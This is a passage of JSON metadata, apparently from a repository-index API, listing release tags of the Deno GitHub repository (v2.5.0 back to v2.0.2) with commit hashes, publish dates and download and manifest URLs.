a":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z"